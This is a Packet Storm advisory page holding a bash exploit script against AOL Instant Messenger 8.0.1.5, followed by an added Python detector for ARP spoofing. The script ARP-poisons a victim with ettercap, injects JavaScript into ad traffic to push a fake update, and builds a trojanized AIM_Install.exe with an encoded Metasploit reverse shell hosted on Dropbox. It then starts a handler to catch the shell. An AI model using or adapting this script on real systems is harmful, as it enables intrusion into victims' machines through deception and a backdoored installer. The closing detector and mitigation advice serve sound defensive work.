AOL Instant Messenger 8.0.1.5 Binary Planting

2013-07-08T00:00:00
ID PACKETSTORM:122305
Type packetstorm
Reporter Marshall Whittaker
Modified 2013-07-08T00:00:00

Description

                                        
                                            `#!/bin/bash  
  
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.  
### Leverages binary file planting to My Documents via AIMs advertisement code.  
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.  
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.  
  
### Marshall Whittaker  
  
ATTACKER="192.168.2.10";  
VICTIM="192.168.2.5";  
GATEWAY="192.168.2.1";  
REVPORT="443";  
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";  
  
mkdir ~/aimpwn;  
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;  
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;  
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;  
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;  
echo "}" >> ~/aimpwn/aimpwn.filter;  
echo "}" >> ~/aimpwn/aimpwn.filter;  
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;  
### wget section.  
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;  
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;  
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;  
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to  
### change ATTACKER IP or port.  
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &  
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;  
`
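The whole chain above depends on the `ettercap -M arp:remote /$GATEWAY/ /$VICTIM/` step: the attacker must answer for both the gateway's and the victim's IP addresses before any advertisement response can be rewritten. That position is visible on the wire as the same IP being announced with more than one MAC address. The detector below is an added, defender-side example; it is not part of the Packet Storm advisory or of Marshall Whittaker's script. It assumes ARP replies in a `tcpdump -e -n arp` style text format; the capture lines, the `192.168.2.x` addresses (reused from the script's variables) and every MAC address in it are constructed for the demonstration.

```python
"""Flag ARP replies that rebind an already-seen IP address to a different MAC.

Added example (not part of the advisory or its author's script). Input is
text in the shape of `tcpdump -e -n arp` output; the sample below is
constructed, and so are all MAC addresses in it.
"""
import re
from collections import defaultdict

# Constructed capture. 192.168.2.1 is the gateway and 192.168.2.5 the client.
# The host with MAC aa:bb:cc:dd:ee:ff (made up) starts claiming both addresses
# a few seconds in, which is the pattern arp:remote mode leaves behind.
SAMPLE_ARP_LINES = """\
10:00:01.000000 00:11:22:33:44:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.2.1 tell 192.168.2.5, length 28
10:00:01.000500 00:11:22:33:44:ff > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.2.1 is-at 00:11:22:33:44:ff, length 28
10:00:02.000000 00:11:22:33:44:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Reply 192.168.2.5 is-at 00:11:22:33:44:01, length 28
10:00:05.000000 00:11:22:33:44:ff > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Reply 192.168.2.1 is-at 00:11:22:33:44:ff, length 28
10:00:09.000000 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.2.1 is-at aa:bb:cc:dd:ee:ff, length 28
10:00:09.000200 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:ff, ethertype ARP (0x0806), length 42: Reply 192.168.2.5 is-at aa:bb:cc:dd:ee:ff, length 28
"""

# Only ARP replies carry a binding; requests are skipped by the regex.
ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src_mac>[0-9a-f:]{17}) > (?P<dst_mac>[0-9a-f:]{17}),"
    r".*Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})",
    re.IGNORECASE,
)


def parse_arp_replies(lines):
    """Yield (timestamp, ip, claimed_mac, frame_src_mac) for each ARP reply line."""
    for line in lines:
        m = ARP_REPLY_RE.match(line)
        if m:
            yield m["ts"], m["ip"], m["mac"].lower(), m["src_mac"].lower()


def detect_arp_conflicts(lines, gateway_ip=None):
    """Return one alert dict per reply that contradicts an earlier IP-to-MAC binding.

    The first MAC seen for an IP is taken as the baseline; a real sensor would
    seed the baseline from DHCP leases or an inventory instead of trusting the
    first reply. Conflicts on the gateway address are rated high because that
    is the position needed to rewrite the client's HTTP traffic.
    """
    baseline = {}
    alerts = []
    for ts, ip, mac, src_mac in parse_arp_replies(lines):
        if ip not in baseline:
            baseline[ip] = mac
            continue
        if mac != baseline[ip]:
            alerts.append({
                "time": ts,
                "ip": ip,
                "expected_mac": baseline[ip],
                "seen_mac": mac,
                "frame_src": src_mac,
                "severity": "high" if ip == gateway_ip else "medium",
            })
    return alerts


def suspected_spoofers(alerts):
    """Map each conflicting MAC to the IPs it claimed, keeping MACs that claimed two or more.

    A single MAC impersonating both ends of a conversation is the full-duplex
    poisoning pattern; a MAC claiming one address once is more likely a
    legitimate NIC swap or DHCP churn and is left for manual review.
    """
    by_mac = defaultdict(set)
    for a in alerts:
        by_mac[a["seen_mac"]].add(a["ip"])
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) >= 2}


if __name__ == "__main__":
    found = detect_arp_conflicts(SAMPLE_ARP_LINES.splitlines(), gateway_ip="192.168.2.1")
    for a in found:
        print(f"[{a['severity']}] {a['time']} {a['ip']} expected {a['expected_mac']} "
              f"but saw {a['seen_mac']} (frame from {a['frame_src']})")
    print("suspected spoofers:", suspected_spoofers(found))
```

Run on the constructed sample it reports two conflicts, one high (the gateway) and one medium (the client), and attributes both to the same MAC. Static ARP entries for the gateway, dynamic ARP inspection on the switch, or simply refusing cleartext HTTP for software downloads each remove a link from the chain the script relies on.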